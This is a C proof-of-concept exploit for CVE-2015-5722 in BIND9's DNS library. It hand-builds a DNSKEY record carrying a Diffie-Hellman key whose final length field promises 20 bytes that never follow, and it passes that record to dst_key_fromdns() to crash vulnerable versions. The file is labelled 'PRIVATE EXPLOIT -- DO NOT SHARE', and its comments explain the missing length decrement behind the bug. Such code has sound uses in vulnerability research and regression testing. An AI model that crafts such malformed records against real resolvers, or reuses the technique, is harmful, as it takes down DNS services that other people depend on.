/*
* compile with:
*
* gcc -g -O2 -Wall -I/usr/include/bind9 CVE-2015-5722.c -lisc -ldns
*
 * Crash is caused by not decrementing the r.length field in
 * openssldh_fromdns: once the prime and generator have been consumed the
 * remaining-length value is stale, so the bounds check on the trailing
 * public-value field passes even though the RDATA ends right after that
 * field's length (see the "missing pub field" marker below). The result is
 * a crash of the process parsing the key, i.e. a denial of service; this
 * PoC demonstrates nothing beyond the crash.
*
* PRIVATE EXPLOIT -- DO NOT SHARE
* */
#include <isc/mem.h>
#include <isc/buffer.h>
#include <isc/entropy.h>
#include <dst/dst.h>
#include <dns/name.h>
#include <dns/fixedname.h>
#include <err.h>
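/*
 * Entry point: feed a truncated DH (algorithm 2) DNSKEY RDATA to
 * dst_key_fromdns() and report how the library handled it.
 *
 * The blob is well-formed up to its last length field: 2-byte flags, 1-byte
 * protocol, 1-byte algorithm, then the DH public key as three length-prefixed
 * fields (prime, generator, public value; RFC 2539 layout). The final field
 * announces a 20-byte public value but the blob ends immediately after that
 * length. A parser that re-checks each field against the bytes actually
 * remaining rejects this; the vulnerable openssldh_fromdns() did not
 * decrement its remaining-length counter and crashed instead (see the file
 * header).
 *
 * Exit status: 0 only if the library accepted the truncated key, which is
 * not expected on any version; 1 if setup failed or the parse was rejected
 * (patched library -- the ISC result text is printed). On a vulnerable
 * library the process dies inside dst_key_fromdns() and never returns here.
 *
 * All library state (key, dst library, entropy and memory contexts) is
 * released on the non-crashing paths so a leak checker stays quiet.
 */
int
main(void)
{
	int rc = 1;
	isc_mem_t *mctx = NULL;
	isc_entropy_t *ectx = NULL;
	dst_key_t *key = NULL;

	if (isc_mem_create(0, 0, &mctx) != ISC_R_SUCCESS) {
		errx(1, "isc_mem_create");
	}
	if (isc_entropy_create(mctx, &ectx) != ISC_R_SUCCESS) {
		warnx("isc_entropy_create");
		goto out_mem;
	}
	if (dst_lib_init(mctx, ectx, 0) != ISC_R_SUCCESS) {
		warnx("dst_lib_init");
		goto out_entropy;
	}

	/* Owner name for the key; its value is irrelevant to the bug. */
	char owner[] = "test.";
	isc_buffer_t nbuf;
	isc_buffer_init(&nbuf, owner, sizeof(owner) - 1);
	isc_buffer_add(&nbuf, sizeof(owner) - 1);

	dns_fixedname_t fname;
	dns_fixedname_init(&fname);
	dns_name_t *name = dns_fixedname_name(&fname);
	if (dns_name_fromtext(name, &nbuf, NULL, 0, NULL) != ISC_R_SUCCESS) {
		warnx("dns_name_fromtext");
		goto out_dst;
	}

	/*
	 * DNSKEY RDATA with a DH public key whose last field is truncated.
	 * Must stay non-const: isc_buffer_init() takes a writable base.
	 */
	unsigned char blob[] = {
		0, 0,	/* flags */
		0,	/* protocol */
		2,	/* algorithm: 2 = Diffie-Hellman */
		0, 20,	/* prime length */
		1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
		11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
		0, 20,	/* generator length */
		1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
		11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
		0, 20,	/* public value length -- but no public value follows */
	};
	isc_buffer_t kbuf;
	isc_buffer_init(&kbuf, blob, sizeof(blob));
	isc_buffer_add(&kbuf, sizeof(blob));

	/* Class 1 = IN. A vulnerable library crashes inside this call. */
	isc_result_t ret = dst_key_fromdns(name, 1, &kbuf, mctx, &key);
	if (ret != ISC_R_SUCCESS) {
		/* Parse rejected before the truncated field was read: patched. */
		warnx("dst_key_fromdns: %s", isc_result_totext(ret));
		goto out_dst;
	}

	warnx("dst_key_fromdns accepted a truncated DH key (unexpected)");
	dst_key_free(&key);
	rc = 0;

out_dst:
	dst_lib_destroy();
out_entropy:
	isc_entropy_detach(&ectx);
out_mem:
	isc_mem_destroy(&mctx);
	return rc;
}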